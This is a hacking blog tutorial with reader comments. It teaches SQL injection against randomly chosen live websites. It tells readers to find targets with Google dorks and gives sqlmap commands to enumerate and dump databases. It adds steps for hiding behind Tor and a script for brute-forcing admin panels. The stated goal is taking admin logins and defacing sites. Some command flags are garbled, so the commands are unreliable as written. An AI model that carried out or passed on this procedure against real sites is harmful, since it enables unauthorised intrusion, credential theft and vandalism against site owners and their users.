We all know websites need a database to store data. That is called s RDBMS – relational database management system. These databases store data in tables and columns so that it can be accessed easily. Server side languages like PHP can interact with SQL database with proper authentication and has read/write permission. Most of the sensitive information are stored in these databases like login credential. Hackers first preference is to take down a database so that he can login to the admin panel with the credentials he retrieved.

Sql injection is a method of exploiting a vulnerability in a server side script. Scripts that do not filter special chars properly are vulnerable to this attack. If a non filtered string is allowed to be in the query the string get executed as a query. This way of injecting custom crafted queries into a script is called sql injection.

Video Demo

consider a scenario: a php script that accepts a get parameter “name” and the script searches a table in a databse (eg url : www.example.com/search.php?name=bill).

The query looks like this


SELECT * FROM ‘profiles’ WHERE name = ‘bill’;

If you add a single quote at the end of the url


the query get executed like this :

SELECT * FROM ‘profiles’ WHERE name = ‘bill ‘ ‘;

This will give you a syntax error, this means the target is vulnerable. instead of the single quote we inject our custom queries to fetch the sensitive data.


Finding a target

You can randomly choose a target by google dorks. In the google search bar try the keyword:
you will get plenty of results, choose a target and open the url by adding a quote at the end. If the website shows a syntax error or a blank page the site is most probably vulnerable. Copy the target url to the clipboard. There are plenty other dorks try that too.


Sqlmap is a python script exclusively designed for database attacks. Its very stable and have too many options. So lets start.
# sqlmap -u http://target.com/vuln.php?id=1 —-dbs


This is the first step. Sqlmap will scan the given parameter for all possible injection technique. Once you get a possible method sqlmap will ask whether you want to scan for more vulnerabilities. You can stop or continue, thats up to you. since we gave the “–dbs” option, sqlmap will retrieve the database names. Once you get the database name you can fetch tables and columns
# sqlmap -u http://target.com/vuln.php?id=1 -D database_name —-tables

After fetching database and tables, fetch columns


# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name —-columns

Dump the data from the columns


# sqlmap -u http://target.com/vuln.php?id=1 -D database_name -T table_name -C column_name —-dump





Sql map can be used with tor proxy for safe and anonymous attack
# sqlmap —-tor —-check-tor —-tor-type=SOCKS5 -u http://target.com/vuln.php?id=1 —-dbs


Increase the speed using multi-threading


# sqlmap —-threads 10 -u http://target.com/vuln.php?id=1 —-dbs
This will help you to get the admin login details. You can access to the control panel and deface the whole website. I have designed a simple script to find admin panel of a website. Download cpsan.py from GitHub. click here .


or directly clone by the command


# git-clone https://github.com/susmithHCK/cpscan.git


This python script bruteforce all the possible directories of a server and detects control panel by http response codes. This can detect almost 85% of websites. Hope this helped you guys. Any doubts or questions please use the comment box below.

Categories: Hacking

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you


Akash Patel · May 13, 2016 at 5:01 am

Whoa ! Thanks, Amazing Tutorial Man ! Keep sharing ..

    admin · May 13, 2016 at 10:05 am

    Using google search or in sqlmap itself?

Frederic Ip · July 15, 2016 at 9:40 pm

Thank you for the good writeup. It in fact was a amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?

    susmith HCK · July 15, 2016 at 11:42 pm

    add me on facebook messenger m.me/SusmithHCK

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.